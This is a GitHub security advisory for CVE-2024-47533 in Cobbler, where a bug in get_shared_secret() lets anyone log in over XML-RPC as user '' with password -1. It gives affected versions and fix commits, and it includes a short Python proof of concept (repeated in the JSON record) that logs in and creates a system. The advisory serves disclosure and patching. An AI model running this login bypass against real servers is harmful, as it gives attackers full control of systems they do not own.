ghsa-m26c-fcgh-cp6h
Vulnerability from github
Published
2024-11-18 20:00
Modified
2024-11-18 20:00
Severity ?
9.8 (Critical) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Summary
cobbler allows anyone to connect to cobbler XML-RPC server with known password and make changes
Details

Summary

utils.get_shared_secret() always returns -1 - allows anyone to connect to cobbler XML-RPC as user '' password -1 and make any changes.

Details

utils.py get_shared_secret: ``` def get_shared_secret() -> Union[str, int]: """ The 'web.ss' file is regenerated each time cobblerd restarts and is used to agree on shared secret interchange between the web server and cobblerd, and also the CLI and cobblerd, when username/password access is not required. For the CLI, this enables root users to avoid entering username/pass if on the Cobbler server.

:return: The Cobbler secret which enables full access to Cobbler.
"""

try:
    with open("/var/lib/cobbler/web.ss", 'rb', encoding='utf-8') as fd:
        data = fd.read()
except:
    return -1
return str(data).strip()

Always returns `-1` because of the following exception: binary mode doesn't take an encoding argument ```

This appears to have been introduced by commit 32c5cada013dc8daa7320a8eda9932c2814742b0 and so affects versions 3.0.0+.

PoC

```

!/usr/bin/python3

import ssl import xmlrpc.client

params = { 'proto': 'https', 'host': 'COBBLER_SERVER', 'port': '443', 'username': '', 'password': -1 } ssl_context = ssl._create_unverified_context()

url = '{proto}://{host}:{port}/cobbler_api'.format(**params) if ssl_context: conn = xmlrpc.client.ServerProxy(url, context=ssl_context) else: conn = xmlrpc.client.Server(url)

try: token = conn.login(params['username'], params['password']) except xmlrpc.client.Fault as e: print("Failed to log in to Cobbler '{url}' as '{username}'. {error}".format(url=url, error=e, params)) except Exception as e: print("Connection to '{url}' failed. {error}".format(url=url, error=e, params))

print("Login success!")

system_id = conn.new_system(token) ```

Impact

This gives anyone with network access to a cobbler server full control of the server.

Show details on source website

To clipboard 

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "cobbler"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "3.3.0"
            },
            {
              "fixed": "3.3.7"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "cobbler"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "3.0.0"
            },
            {
              "fixed": "3.2.3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2024-47533"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-287"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2024-11-18T20:00:56Z",
    "nvd_published_at": "2024-11-18T17:15:11Z",
    "severity": "CRITICAL"
  },
  "details": "### Summary\n\nutils.get_shared_secret() always returns -1 - allows anyone to connect to cobbler XML-RPC as user \u0027\u0027 password -1 and make any changes.\n\n### Details\nutils.py get_shared_secret:\n```\ndef get_shared_secret() -\u003e Union[str, int]:\n    \"\"\"\n    The \u0027web.ss\u0027 file is regenerated each time cobblerd restarts and is used to agree on shared secret interchange\n    between the web server and cobblerd, and also the CLI and cobblerd, when username/password access is not required.\n    For the CLI, this enables root users to avoid entering username/pass if on the Cobbler server.\n\n    :return: The Cobbler secret which enables full access to Cobbler.\n    \"\"\"\n\n    try:\n        with open(\"/var/lib/cobbler/web.ss\", \u0027rb\u0027, encoding=\u0027utf-8\u0027) as fd:\n            data = fd.read()\n    except:\n        return -1\n    return str(data).strip()\n```\nAlways returns `-1` because of the following exception:\n```\nbinary mode doesn\u0027t take an encoding argument\n```\n\nThis appears to have been introduced by commit 32c5cada013dc8daa7320a8eda9932c2814742b0 and so affects versions 3.0.0+.\n\n### PoC\n```\n#!/usr/bin/python3\n\nimport ssl\nimport xmlrpc.client\n\nparams = { \u0027proto\u0027: \u0027https\u0027, \u0027host\u0027: \u0027COBBLER_SERVER\u0027, \u0027port\u0027: \u0027443\u0027, \u0027username\u0027: \u0027\u0027, \u0027password\u0027: -1 }\nssl_context = ssl._create_unverified_context()\n\nurl = \u0027{proto}://{host}:{port}/cobbler_api\u0027.format(**params)\nif ssl_context:\n    conn = xmlrpc.client.ServerProxy(url, context=ssl_context)\nelse:\n    conn = xmlrpc.client.Server(url)\n\ntry:\n    token = conn.login(params[\u0027username\u0027], params[\u0027password\u0027])\nexcept xmlrpc.client.Fault as e:\n    print(\"Failed to log in to Cobbler \u0027{url}\u0027 as \u0027{username}\u0027. {error}\".format(url=url, error=e, **params))\nexcept Exception as e:\n    print(\"Connection to \u0027{url}\u0027 failed. {error}\".format(url=url, error=e, **params))\n\nprint(\"Login success!\")\n\nsystem_id = conn.new_system(token)\n```\n\n\n### Impact\nThis gives anyone with network access to a cobbler server full control of the server.\n",
  "id": "GHSA-m26c-fcgh-cp6h",
  "modified": "2024-11-18T20:00:56Z",
  "published": "2024-11-18T20:00:56Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/cobbler/cobbler/security/advisories/GHSA-m26c-fcgh-cp6h"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-47533"
    },
    {
      "type": "WEB",
      "url": "https://github.com/cobbler/cobbler/commit/32c5cada013dc8daa7320a8eda9932c2814742b0"
    },
    {
      "type": "WEB",
      "url": "https://github.com/cobbler/cobbler/commit/e19717623c10b29e7466ed4ab23515a94beb2dda"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/cobbler/cobbler"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "cobbler allows anyone to connect to cobbler XML-RPC server with known password and make changes"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
  • Confirmed: The vulnerability is confirmed from an analyst perspective.
  • Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
  • Patched: This vulnerability was successfully patched by the user reporting the sighting.
  • Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
  • Not confirmed: The user expresses doubt about the veracity of the vulnerability.
  • Not patched: This vulnerability was not successfully patched by the user reporting the sighting.